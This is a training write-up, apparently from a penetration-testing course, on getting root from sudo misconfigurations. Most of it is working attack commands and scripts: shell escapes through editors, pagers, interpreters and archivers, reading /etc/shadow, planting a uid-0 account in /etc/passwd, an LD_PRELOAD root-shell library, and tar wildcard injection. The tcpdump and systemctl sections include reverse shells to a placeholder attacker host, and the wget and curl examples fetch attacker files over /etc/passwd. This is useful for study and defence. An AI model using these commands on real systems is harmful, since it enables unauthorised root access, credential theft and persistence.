Sudo Exploitation Techniques

intermediate · 35 min · Writeup

Exploiting various sudo configurations

Learning Objectives

  • Exploit sudo with GTFOBins
  • Bypass sudo restrictions
  • Exploit NOPASSWD entries
  • Chain sudo with other vulns

You've found the sudo entries with sudo -l; now let's exploit them. This lesson covers exploitation techniques for a range of sudo configurations, from simple shell escapes to more advanced bypasses.

Each binary that sudo allows has potential escape vectors. Some are obvious (vim → :!bash), others are creative (apache2 → config include). GTFOBins is your reference, but understanding WHY these work helps you find new ones.

Categories of Exploitation

Sudo exploitation falls into categories: shell escapes, file read/write, command execution, and environment abuse. Know which category each binary falls into.

Shell Escape Binaries

Text Editors

```bash
# vim / vi
sudo vim -c ':!/bin/bash'
sudo vim
:!bash
:set shell=/bin/bash
:shell

# nano
sudo nano
# Ctrl+R then Ctrl+X opens the "Command to execute:" prompt; type:
reset; bash 1>&0 2>&0

# emacs
sudo emacs -Q -nw --eval '(term "/bin/bash")'
# Or inside emacs: M-x shell

# ed
sudo ed
!bash

# pico
# Same Ctrl+R, Ctrl+X sequence as nano
sudo pico
reset; bash 1>&0 2>&0
```

Pagers

```bash
# less
sudo less /etc/passwd
!bash
# Or: !/bin/bash

# more
sudo more /etc/passwd
!/bin/bash
# Note: more only prompts while there is more to show, so use a file longer
# than the terminal (or shrink the terminal) to get the prompt

# most
sudo most /etc/passwd
!bash

# view (vim in read-only mode)
sudo view /etc/passwd
:!/bin/bash
```

System Utilities

```bash
# find
sudo find . -exec /bin/bash \; -quit
# -exec runs once per match, so the start path (or -name) must match something that exists
sudo find /etc/passwd -exec /bin/bash \;

# man
sudo man man
!/bin/bash
# Or through the pager variable, only if sudo keeps PAGER (env_keep or SETENV):
sudo PAGER=/bin/bash man man

# watch
sudo watch -x bash -c 'reset; exec bash 1>&0 2>&0'

# time
sudo time /bin/bash

# nice
sudo nice /bin/bash

# env
sudo env /bin/bash

# timeout
sudo timeout --foreground 10 /bin/bash

# strace
sudo strace -o /dev/null /bin/bash

# ltrace
sudo ltrace -L /bin/bash
```

-p Flag for Shells

bash resets its effective UID to the real UID at startup when the two differ, which is what happens when a setuid-root binary spawns it; -p tells bash to keep the effective UID. Under sudo the real and effective UID are both root already, so -p changes nothing there, but if an escape leaves you with a non-root prompt from a setuid context, re-running with bash -p is the first thing to try.

Language Interpreters

```bash
# Python
sudo python -c 'import pty; pty.spawn("/bin/bash")'
sudo python -c 'import os; os.system("/bin/bash")'

# Python3
sudo python3 -c 'import os; os.system("/bin/bash")'

# Perl
sudo perl -e 'exec "/bin/bash";'

# Ruby
sudo ruby -e 'exec "/bin/bash"'

# Lua
sudo lua -e 'os.execute("/bin/bash")'

# PHP
sudo php -r 'system("/bin/bash");'

# Node.js
sudo node -e 'require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})'

# awk
sudo awk 'BEGIN {system("/bin/bash")}'

# sed (GNU sed only: the e command runs a shell command)
sudo sed -n '1e exec bash 1>&0' /etc/passwd
```

File Read/Write Binaries

Reading Sensitive Files

```bash
# cat / head / tail / tac
sudo cat /etc/shadow
sudo head /etc/shadow
sudo tail /etc/shadow
sudo tac /etc/shadow

# grep
sudo grep -r . /etc/shadow

# base64
sudo base64 /etc/shadow | base64 -d

# xxd
sudo xxd /etc/shadow | xxd -r

# dd
sudo dd if=/etc/shadow

# diff
sudo diff /etc/shadow /dev/null
sudo diff --line-format=%L /dev/null /etc/shadow
```

Writing Files (Overwrite passwd)

```bash
# Generate a password hash (-1 is MD5 crypt; -6 gives SHA-512 crypt if you prefer)
openssl passwd -1 -salt xyz password123
# Output: $1$xyz$hashvalue

# New passwd entry: seven colon-separated fields with uid 0 and gid 0
# Format: user:hash:uid:gid:gecos:home:shell
hacker:$1$xyz$hashvalue:0:0:root:/root:/bin/bash

# Using tee (-a appends; without it you overwrite the whole file)
echo 'hacker:$1$xyz$hashvalue:0:0:root:/root:/bin/bash' | sudo tee -a /etc/passwd

# Using cp
cp /etc/passwd /tmp/passwd
echo 'hacker:$1$xyz$hashvalue:0:0:root:/root:/bin/bash' >> /tmp/passwd
sudo cp /tmp/passwd /etc/passwd

# Using dd: conv=notrunc is required, oflag=append alone still truncates the file first
echo 'hacker:$1$xyz$hashvalue:0:0:root:/root:/bin/bash' | sudo dd of=/etc/passwd oflag=append conv=notrunc

# Now: su hacker (password: password123) → root!
```
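As an added example that is not part of the original lesson, the script below builds the same root-UID passwd line with openssl and appends it with dd, but against a scratch copy of passwd, so you can check the entry format and dd's truncation behaviour before touching the real file. The user name hacker, the salt xyz and the two-line sample passwd are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the lesson): build the root-UID passwd line and append it
# with dd against a scratch copy of /etc/passwd, so the format and dd's behaviour can
# be checked without privileges. User "hacker", salt "xyz" and the two sample lines
# are constructed for the demo.

# crypt hash of PASSWORD with SALT: SHA-512 ($6$) if this openssl supports -6, else MD5 ($1$)
passwd_hash() {
    openssl passwd -6 -salt "$2" "$1" 2>/dev/null || openssl passwd -1 -salt "$2" "$1"
}

# seven-field passwd line with uid 0 / gid 0: name:hash:uid:gid:gecos:home:shell
passwd_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$(passwd_hash "$2" "$3")"
}

# check before touching the real file: 7 fields, uid and gid 0, hash in $N$ crypt form
valid_entry() {
    printf '%s\n' "$1" | awk -F: 'NF == 7 && $3 == 0 && $4 == 0 && $2 ~ /^\$[0-9a-z]+\$/ { ok = 1 } END { exit !ok }'
}

# append LINE to FILE via dd; conv=notrunc is what keeps the existing content
append_with_dd() {
    printf '%s\n' "$2" | dd of="$1" oflag=append conv=notrunc 2>/dev/null
}

# the footgun: oflag=append alone still opens the output with O_TRUNC first
append_with_dd_truncating() {
    printf '%s\n' "$2" | dd of="$1" oflag=append 2>/dev/null
}

# scratch passwd with two constructed lines; prints the line count after appending
demo() {
    f=$(mktemp)
    printf 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n' > "$f"
    "$1" "$f" "$(passwd_entry hacker password123 xyz)"
    wc -l < "$f" | tr -d ' '
    rm -f "$f"
}

demo append_with_dd              # 3: entry appended, originals intact
demo append_with_dd_truncating   # 1: originals gone, only the new entry survives
```

Run valid_entry on the line you generated before you pipe it into tee, cp or dd as root; a missing field or a malformed hash in /etc/passwd is not something you want to discover after logging out.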

Network Tool Exploitation

```bash
# nmap (old versions with interactive mode)
sudo nmap --interactive
!bash
# Newer versions: run an NSE (Lua) script from a file you control
TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TF

# tcpdump
# -z runs a command after each capture-file rotation; -Z root stops tcpdump from
# dropping privileges before it runs. The command has no terminal, so call back out.
cat > /tmp/shell.sh <<'EOF'
#!/bin/bash
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1
EOF
chmod +x /tmp/shell.sh
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root
# Rotation only happens when packets arrive: ping -c 3 127.0.0.1 from another shell

# wget
# Download over a file you choose
sudo wget http://attacker/evil_passwd -O /etc/passwd

# curl
# Same idea as wget
sudo curl http://attacker/evil_passwd -o /etc/passwd

# ftp
sudo ftp
!/bin/bash

# ssh
sudo ssh -o ProxyCommand=';bash 0<&2 1>&2' x

# socat
sudo socat stdin exec:/bin/bash
```

Package Manager Exploitation

```bash
# apt / apt-get
sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash
# Or build a .deb whose postinst script runs your payload

# dpkg
# Install a malicious package with a postinst script (sudo dpkg -i evil.deb)

# yum
# Build an RPM whose %post scriptlet runs your payload, then:
sudo yum localinstall /path/to/malicious.rpm

# pip
# setup.py is executed as Python during the install
TF=$(mktemp -d)
echo "import os; os.system('/bin/bash')" > $TF/setup.py
sudo pip install $TF

# gem
# gem build evaluates the gemspec as Ruby, so the shell spawns during the build itself
TF=$(mktemp -d)
echo 'system("/bin/bash")' > $TF/x.rb
sudo gem build $TF/x.rb
```

Service-Related Binaries

```bash
# systemctl
# Create a malicious unit file (oneshot service that calls back to you)
TF=$(mktemp).service
cat > $TF <<'EOF'
[Service]
Type=oneshot
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/ATTACKER/PORT 0>&1"
[Install]
WantedBy=multi-user.target
EOF
sudo systemctl link $TF
sudo systemctl enable --now $TF

# service
# Resolves /etc/init.d/<name>, so a relative path escapes to any script you control
sudo service ../../../tmp/evil_service start

# apache2 / nginx
# Both parse whatever config file they are pointed at and quote the offending line
# in the error message, which turns -f / -c into an arbitrary file read
sudo apache2 -f /etc/shadow
sudo nginx -c /etc/shadow
# With a writable config, Include a file that LoadModule's a shared object you built

# mysql
sudo mysql -e '\! /bin/bash'

# psql
sudo psql
\! /bin/bash

# sqlite3
sudo sqlite3 /dev/null '.shell /bin/bash'
```

Compression Tools

```bash
# tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

# zip
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'bash #'

# gzip / gunzip
# Use to read files: compress to stdout as root, decompress as yourself
sudo gzip -c /etc/shadow | gzip -d

# 7z
# Pack the file into a tar stream on stdout, then unpack that stream to stdout
sudo 7z a -ttar -an -so /etc/shadow | 7z e -ttar -si -so
```

Wildcard Abuse

```bash
# Case 1: the sudoers entry itself contains a wildcard
# (root) /usr/bin/cat /var/log/*
# sudo matches the whole argument string against the pattern with fnmatch, and in
# arguments * matches "/" and spaces, so traversal and extra options get through:
sudo /usr/bin/cat /var/log/../../../etc/shadow

# (root) /usr/bin/tar -cf /backup/* *
sudo tar -cf /backup/x --checkpoint=1 --checkpoint-action=exec=/bin/bash

# Case 2: a root-run script or cron job expands a bare * itself (tar -cf backup.tar *)
# Create files in the globbed directory whose names are option flags:
cd /home/you          # the directory the script globs; you need write access there
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=bash'
# When the shell expands *, these names become arguments and tar parses them as options!

# Same trick works for rsync (-e), find with -exec, and anything else that takes flags
```

Wildcard Injection

When a sudoers entry contains a wildcard (*), check which argument strings it lets through: option flags for the binary, and paths outside the intended directory. When a root-run script or cron job expands a bare * itself, check whether you can create files in that directory whose names become option arguments. This is especially powerful with tar, rsync, and find.
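Added example (not from the original lesson): a harmless reproduction of tar wildcard injection that runs as a normal user. The scratch directory, the payload.sh script and the marker file are constructed for the demo; the root cron job or sudo-run backup script that does tar -cf backup.tar * is the hypothetical target, and GNU tar is assumed. The same function also shows the two fixes (./* and --) so you can see why they stop the injection.

```shell
#!/bin/sh
# Added example (not from the lesson): tar wildcard injection reproduced without root.
# Target: a root cron job or sudo-run backup script that does `tar -cf backup.tar *`.
# Here a marker file stands in for the root shell the injected option would spawn.

# Runs `tar -cf /dev/null <glob>` in a scratch directory seeded with option-named files.
# GLOB is the form the hypothetical script uses: '*', './*' or '-- *'.
# Prints "pwned" if the injected --checkpoint-action executed, "clean" otherwise.
wildcard_tar_demo() {
    glob=$1
    work=$(mktemp -d) || return 1
    marker=$work/marker
    (
        cd "$work" || exit 1
        # payload the injected option runs; a real attack would spawn bash or plant a suid copy
        printf '#!/bin/sh\necho pwned > "%s"\n' "$marker" > payload.sh
        # filenames that tar parses as options once the glob expands them into argv
        touch -- '--checkpoint=1'
        touch -- '--checkpoint-action=exec=sh payload.sh'
        # the backup command as the script would write it; the glob is unquoted on purpose
        case $glob in
            '*')    tar -cf /dev/null * ;;
            './*')  tar -cf /dev/null ./* ;;   # names start with ./ so tar sees file paths
            '-- *') tar -cf /dev/null -- * ;;  # -- ends option parsing
        esac
    ) >/dev/null 2>&1
    if [ -f "$marker" ]; then cat "$marker"; else echo clean; fi
    rm -rf "$work"
}

wildcard_tar_demo '*'      # pwned: the option-named files were parsed as options
wildcard_tar_demo './*'    # clean
wildcard_tar_demo '-- *'   # clean
```

The exec action is run by tar through /bin/sh -c, which is why a space-containing name like --checkpoint-action=exec=sh payload.sh works as one argument: the shell that expanded the glob hands it to tar as a single word, and tar hands it to another shell as a command line.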

Environment Variable Exploitation

```bash
# If sudo preserves environment (env_keep or SETENV):
# Check sudo -l for env_keep or SETENV. With env_reset (the default) every
# variable not listed in env_keep is dropped, including all of the ones below.

# LD_PRELOAD (sudo drops LD_* unless env_keep lists it, but check)
cat > /tmp/pwn.c <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
/* constructor runs when the library is loaded into the sudo-run process */
static void pwn(void) __attribute__((constructor));
void pwn(void) {
    unsetenv("LD_PRELOAD");   /* otherwise every child of the new shell preloads this again */
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -o /tmp/pwn.so /tmp/pwn.c
sudo LD_PRELOAD=/tmp/pwn.so any_allowed_command

# PERL5OPT / PERL5DB (both must be kept)
sudo PERL5OPT=-d PERL5DB='exec "/bin/bash"' /usr/bin/perl_script

# PYTHONPATH
# If kept, put a module with the same name as one the allowed script imports
# into a directory you control and point PYTHONPATH at it
```

Sudo Exploitation Methodology

Advanced Sudo Attack Flow

  1. Parse: understand the exact sudo -l output
  2. GTFOBins: check each binary for known escapes
  3. Category: identify shell escape, file r/w, command exec
  4. Wildcards: check for path traversal or argument injection
  5. Environment: check for env_keep or SETENV
  6. Chain: combine techniques if a single one doesn't work
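To make step 1 of the flow concrete, here is an added triage script (not part of the original lesson) that parses sudo -l output and tags each allowed command with its escape category and the attributes that decide the attack: NOPASSWD, SETENV, wildcards, and env_keep entries that hand you the loader or an interpreter. The sudo -l text, the user alice and the host web01 are constructed sample data, and the category table is a small hand-made subset of what GTFOBins covers.

```shell
#!/bin/sh
# Added example (not from the lesson): triage of `sudo -l` output.
# Tags every allowed command with a GTFOBins-style escape category plus the sudoers
# attributes that matter (NOPASSWD, SETENV, wildcards) and flags risky env_keep entries.

# Constructed sample output for a hypothetical user "alice" on host "web01".
SAMPLE_SUDO_L='Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, env_keep+="LD_PRELOAD",
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/tar -cf /backup/* *
    (ALL : ALL) SETENV: /usr/bin/vim
    (root) /usr/bin/cat /var/log/*
    (root) NOPASSWD: /usr/sbin/service apache2 restart'

# Hand-made subset of GTFOBins; extend it from the real reference.
category_of() {
    case "$1" in
        ALL) echo all-commands ;;
        vim|vi|view|nano|less|more|man|find|python|python3|perl|ruby|awk|env|nice|timeout|strace|tar|zip|mysql|psql|sqlite3)
            echo shell-escape ;;
        cat|head|tail|tac|grep|base64|xxd|diff|dd)
            echo file-read ;;
        tee|cp|mv|wget|curl)
            echo file-write ;;
        systemctl|service|apt|apt-get|dpkg|yum|pip|gem)
            echo command-exec ;;
        *)  echo unknown ;;
    esac
}

# Reads sudo -l text from $1 and prints one line per command:
#   <binary> <category> <runas> <flags>   (flags: comma-joined tags, WILDCARD, or -)
triage_sudo() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*\(/ {                       # command lines start with "(runas)"
            line = $0
            sub(/^[ \t]+/, "", line)
            runas = line
            sub(/\).*/, "", runas)
            sub(/^\(/, "", runas)
            gsub(/ /, "", runas)            # "(ALL : ALL)" -> "ALL:ALL"
            sub(/^\([^)]*\)[ \t]*/, "", line)
            flags = ""
            while (match(line, /^[A-Z]+:[ \t]*/)) {   # NOPASSWD:, SETENV:, NOEXEC: ...
                tag = substr(line, RSTART, RLENGTH)
                sub(/:.*/, "", tag)
                flags = flags tag ","
                line = substr(line, RSTART + RLENGTH)
            }
            if (index(line, "*") > 0) flags = flags "WILDCARD,"
            cmd = line
            sub(/[ \t].*/, "", cmd)         # first word is the command path
            n = split(cmd, parts, "/")
            sub(/,$/, "", flags)
            if (flags == "") flags = "-"
            print parts[n], runas, flags
        }' | while read -r bin runas flags; do
        printf '%s %s %s %s\n' "$bin" "$(category_of "$bin")" "$runas" "$flags"
    done
}

# Prints env_keep entries that give the caller control over the loader or an interpreter.
env_risk() {
    printf '%s\n' "$1" | grep -o 'env_keep[+]*=[^,]*' \
        | grep -E 'LD_PRELOAD|LD_LIBRARY_PATH|PERL5OPT|PERL5LIB|PYTHONPATH|PYTHONINSPECT|PAGER'
}

triage_sudo "$SAMPLE_SUDO_L"
env_risk "$SAMPLE_SUDO_L" || echo "no risky env_keep entries"
```

Feed it real output with triage_sudo "$(sudo -l)". Anything tagged shell-escape with NOPASSWD is the first thing to try; WILDCARD rows go to the wildcard section, SETENV rows and any env_risk hit go to the environment section, and unknown rows go to GTFOBins by hand.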

Knowledge Check

Question: How can you exploit sudo access to the 'tar' command?

Challenges

Creative Sudo Escape (intermediate)

Given sudo access to run 'find' as root, exploit it to gain a root shell without using the standard -exec technique.

Key Takeaways

  • Most binaries have shell escape vectors - check GTFOBins
  • Pagers (less, more) allow !command for shell access
  • Editors (vim, nano) have built-in shell execution
  • Wildcards in sudo paths enable argument injection
  • tar --checkpoint-action is a common exploitation vector
  • Even read-only binaries can read /etc/shadow